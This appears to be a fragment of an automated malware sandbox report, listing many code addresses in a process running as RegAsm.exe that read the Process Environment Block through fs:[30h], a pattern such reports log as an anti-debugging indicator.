                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D94144 mov eax, dword ptr fs:[00000030h]5_2_02D94144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D94144 mov ecx, dword ptr fs:[00000030h]5_2_02D94144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D94144 mov eax, dword ptr fs:[00000030h]5_2_02D94144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D94144 mov eax, dword ptr fs:[00000030h]5_2_02D94144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD4164 mov eax, dword ptr fs:[00000030h]5_2_02DD4164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD4164 mov eax, dword ptr fs:[00000030h]5_2_02DD4164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAA118 mov ecx, dword ptr fs:[00000030h]5_2_02DAA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAA118 mov eax, dword ptr fs:[00000030h]5_2_02DAA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAA118 mov eax, dword ptr fs:[00000030h]5_2_02DAA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAA118 mov eax, dword ptr fs:[00000030h]5_2_02DAA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC0115 mov eax, dword ptr fs:[00000030h]5_2_02DC0115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE10E mov eax, dword ptr fs:[00000030h]5_2_02DAE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE10E mov ecx, dword ptr fs:[00000030h]5_2_02DAE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE10E mov eax, dword ptr fs:[00000030h]5_2_02DAE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE10E mov eax, dword ptr fs:[00000030h]5_2_02DAE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE10E mov ecx, dword ptr fs:[00000030h]5_2_02DAE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE10E mov eax, dword ptr fs:[00000030h]5_2_02DAE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE10E mov eax, dword ptr fs:[00000030h]5_2_02DAE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE10E mov ecx, dword ptr fs:[00000030h]5_2_02DAE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE10E mov eax, dword ptr fs:[00000030h]5_2_02DAE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE10E mov ecx, dword ptr fs:[00000030h]5_2_02DAE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D30124 mov eax, dword ptr fs:[00000030h]5_2_02D30124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3A6C7 mov ebx, dword ptr fs:[00000030h]5_2_02D3A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3A6C7 mov eax, dword ptr fs:[00000030h]5_2_02D3A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7E6F2 mov eax, dword ptr fs:[00000030h]5_2_02D7E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7E6F2 mov eax, dword ptr fs:[00000030h]5_2_02D7E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7E6F2 mov eax, dword ptr fs:[00000030h]5_2_02D7E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7E6F2 mov eax, dword ptr fs:[00000030h]5_2_02D7E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D806F1 mov eax, dword ptr fs:[00000030h]5_2_02D806F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D806F1 mov eax, dword ptr fs:[00000030h]5_2_02D806F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D04690 mov eax, dword ptr fs:[00000030h]5_2_02D04690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D04690 mov eax, dword ptr fs:[00000030h]5_2_02D04690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D366B0 mov eax, dword ptr fs:[00000030h]5_2_02D366B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3C6A6 mov eax, dword ptr fs:[00000030h]5_2_02D3C6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1C640 mov eax, dword ptr fs:[00000030h]5_2_02D1C640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D32674 mov eax, dword ptr fs:[00000030h]5_2_02D32674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC866E mov eax, dword ptr fs:[00000030h]5_2_02DC866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC866E mov eax, dword ptr fs:[00000030h]5_2_02DC866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3A660 mov eax, dword ptr fs:[00000030h]5_2_02D3A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3A660 mov eax, dword ptr fs:[00000030h]5_2_02D3A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42619 mov eax, dword ptr fs:[00000030h]5_2_02D42619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1260B mov eax, dword ptr fs:[00000030h]5_2_02D1260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1260B mov eax, dword ptr fs:[00000030h]5_2_02D1260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1260B mov eax, dword ptr fs:[00000030h]5_2_02D1260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1260B mov eax, dword ptr fs:[00000030h]5_2_02D1260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1260B mov eax, dword ptr fs:[00000030h]5_2_02D1260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1260B mov eax, dword ptr fs:[00000030h]5_2_02D1260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1260B mov eax, dword ptr fs:[00000030h]5_2_02D1260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7E609 mov eax, dword ptr fs:[00000030h]5_2_02D7E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D36620 mov eax, dword ptr fs:[00000030h]5_2_02D36620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D38620 mov eax, dword ptr fs:[00000030h]5_2_02D38620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1E627 mov eax, dword ptr fs:[00000030h]5_2_02D1E627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0262C mov eax, dword ptr fs:[00000030h]5_2_02D0262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0C7C0 mov eax, dword ptr fs:[00000030h]5_2_02D0C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D807C3 mov eax, dword ptr fs:[00000030h]5_2_02D807C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D047FB mov eax, dword ptr fs:[00000030h]5_2_02D047FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D047FB mov eax, dword ptr fs:[00000030h]5_2_02D047FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8E7E1 mov eax, dword ptr fs:[00000030h]5_2_02D8E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D227ED mov eax, dword ptr fs:[00000030h]5_2_02D227ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D227ED mov eax, dword ptr fs:[00000030h]5_2_02D227ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D227ED mov eax, dword ptr fs:[00000030h]5_2_02D227ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA678E mov eax, dword ptr fs:[00000030h]5_2_02DA678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB47A0 mov eax, dword ptr fs:[00000030h]5_2_02DB47A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D007AF mov eax, dword ptr fs:[00000030h]5_2_02D007AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D00750 mov eax, dword ptr fs:[00000030h]5_2_02D00750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42750 mov eax, dword ptr fs:[00000030h]5_2_02D42750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42750 mov eax, dword ptr fs:[00000030h]5_2_02D42750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8E75D mov eax, dword ptr fs:[00000030h]5_2_02D8E75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D84755 mov eax, dword ptr fs:[00000030h]5_2_02D84755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3674D mov esi, dword ptr fs:[00000030h]5_2_02D3674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3674D mov eax, dword ptr fs:[00000030h]5_2_02D3674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3674D mov eax, dword ptr fs:[00000030h]5_2_02D3674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D08770 mov eax, dword ptr fs:[00000030h]5_2_02D08770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10770 mov eax, dword ptr fs:[00000030h]5_2_02D10770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D00710 mov eax, dword ptr fs:[00000030h]5_2_02D00710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D30710 mov eax, dword ptr fs:[00000030h]5_2_02D30710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3C700 mov eax, dword ptr fs:[00000030h]5_2_02D3C700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7C730 mov eax, dword ptr fs:[00000030h]5_2_02D7C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3273C mov eax, dword ptr fs:[00000030h]5_2_02D3273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3273C mov ecx, dword ptr fs:[00000030h]5_2_02D3273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3273C mov eax, dword ptr fs:[00000030h]5_2_02D3273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3C720 mov eax, dword ptr fs:[00000030h]5_2_02D3C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3C720 mov eax, dword ptr fs:[00000030h]5_2_02D3C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D004E5 mov ecx, dword ptr fs:[00000030h]5_2_02D004E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DBA49A mov eax, dword ptr fs:[00000030h]5_2_02DBA49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D344B0 mov ecx, dword ptr fs:[00000030h]5_2_02D344B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8A4B0 mov eax, dword ptr fs:[00000030h]5_2_02D8A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D064AB mov eax, dword ptr fs:[00000030h]5_2_02D064AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2245A mov eax, dword ptr fs:[00000030h]5_2_02D2245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DBA456 mov eax, dword ptr fs:[00000030h]5_2_02DBA456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E443 mov eax, dword ptr fs:[00000030h]5_2_02D3E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E443 mov eax, dword ptr fs:[00000030h]5_2_02D3E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E443 mov eax, dword ptr fs:[00000030h]5_2_02D3E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E443 mov eax, dword ptr fs:[00000030h]5_2_02D3E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E443 mov eax, dword ptr fs:[00000030h]5_2_02D3E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E443 mov eax, dword ptr fs:[00000030h]5_2_02D3E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E443 mov eax, dword ptr fs:[00000030h]5_2_02D3E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E443 mov eax, dword ptr fs:[00000030h]5_2_02D3E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CF645D mov eax, dword ptr fs:[00000030h]5_2_02CF645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2A470 mov eax, dword ptr fs:[00000030h]5_2_02D2A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2A470 mov eax, dword ptr fs:[00000030h]5_2_02D2A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2A470 mov eax, dword ptr fs:[00000030h]5_2_02D2A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8C460 mov ecx, dword ptr fs:[00000030h]5_2_02D8C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D38402 mov eax, dword ptr fs:[00000030h]5_2_02D38402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D38402 mov eax, dword ptr fs:[00000030h]5_2_02D38402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D38402 mov eax, dword ptr fs:[00000030h]5_2_02D38402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3A430 mov eax, dword ptr fs:[00000030h]5_2_02D3A430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFC427 mov eax, dword ptr fs:[00000030h]5_2_02CFC427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFE420 mov eax, dword ptr fs:[00000030h]5_2_02CFE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFE420 mov eax, dword ptr fs:[00000030h]5_2_02CFE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFE420 mov eax, dword ptr fs:[00000030h]5_2_02CFE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D86420 mov eax, dword ptr fs:[00000030h]5_2_02D86420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D86420 mov eax, dword ptr fs:[00000030h]5_2_02D86420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D86420 mov eax, dword ptr fs:[00000030h]5_2_02D86420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D86420 mov eax, dword ptr fs:[00000030h]5_2_02D86420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D86420 mov eax, dword ptr fs:[00000030h]5_2_02D86420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D86420 mov eax, dword ptr fs:[00000030h]5_2_02D86420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D86420 mov eax, dword ptr fs:[00000030h]5_2_02D86420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D065D0 mov eax, dword ptr fs:[00000030h]5_2_02D065D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3A5D0 mov eax, dword ptr fs:[00000030h]5_2_02D3A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3A5D0 mov eax, dword ptr fs:[00000030h]5_2_02D3A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E5CF mov eax, dword ptr fs:[00000030h]5_2_02D3E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E5CF mov eax, dword ptr fs:[00000030h]5_2_02D3E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D025E0 mov eax, dword ptr fs:[00000030h]5_2_02D025E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E5E7 mov eax, dword ptr fs:[00000030h]5_2_02D2E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E5E7 mov eax, dword ptr fs:[00000030h]5_2_02D2E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E5E7 mov eax, dword ptr fs:[00000030h]5_2_02D2E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E5E7 mov eax, dword ptr fs:[00000030h]5_2_02D2E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E5E7 mov eax, dword ptr fs:[00000030h]5_2_02D2E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E5E7 mov eax, dword ptr fs:[00000030h]5_2_02D2E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E5E7 mov eax, dword ptr fs:[00000030h]5_2_02D2E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2E5E7 mov eax, dword ptr fs:[00000030h]5_2_02D2E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3C5ED mov eax, dword ptr fs:[00000030h]5_2_02D3C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3C5ED mov eax, dword ptr fs:[00000030h]5_2_02D3C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E59C mov eax, dword ptr fs:[00000030h]5_2_02D3E59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D02582 mov eax, dword ptr fs:[00000030h]5_2_02D02582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D02582 mov ecx, dword ptr fs:[00000030h]5_2_02D02582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D34588 mov eax, dword ptr fs:[00000030h]5_2_02D34588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D245B1 mov eax, dword ptr fs:[00000030h]5_2_02D245B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D245B1 mov eax, dword ptr fs:[00000030h]5_2_02D245B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D805A7 mov eax, dword ptr fs:[00000030h]5_2_02D805A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D805A7 mov eax, dword ptr fs:[00000030h]5_2_02D805A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D805A7 mov eax, dword ptr fs:[00000030h]5_2_02D805A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D08550 mov eax, dword ptr fs:[00000030h]5_2_02D08550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D08550 mov eax, dword ptr fs:[00000030h]5_2_02D08550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3656A mov eax, dword ptr fs:[00000030h]5_2_02D3656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3656A mov eax, dword ptr fs:[00000030h]5_2_02D3656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3656A mov eax, dword ptr fs:[00000030h]5_2_02D3656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D96500 mov eax, dword ptr fs:[00000030h]5_2_02D96500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD4500 mov eax, dword ptr fs:[00000030h]5_2_02DD4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD4500 mov eax, dword ptr fs:[00000030h]5_2_02DD4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD4500 mov eax, dword ptr fs:[00000030h]5_2_02DD4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD4500 mov eax, dword ptr fs:[00000030h]5_2_02DD4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD4500 mov eax, dword ptr fs:[00000030h]5_2_02DD4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD4500 mov eax, dword ptr fs:[00000030h]5_2_02DD4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD4500 mov eax, dword ptr fs:[00000030h]5_2_02DD4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D10535 mov eax, dword ptr fs:[00000030h]5_2_02D10535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D10535 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D10535 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D10535 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D10535 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D10535 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D2E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D2E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D2E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D2E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D2E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D00AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D34AD0 mov eax, dword ptr fs:[00000030h]
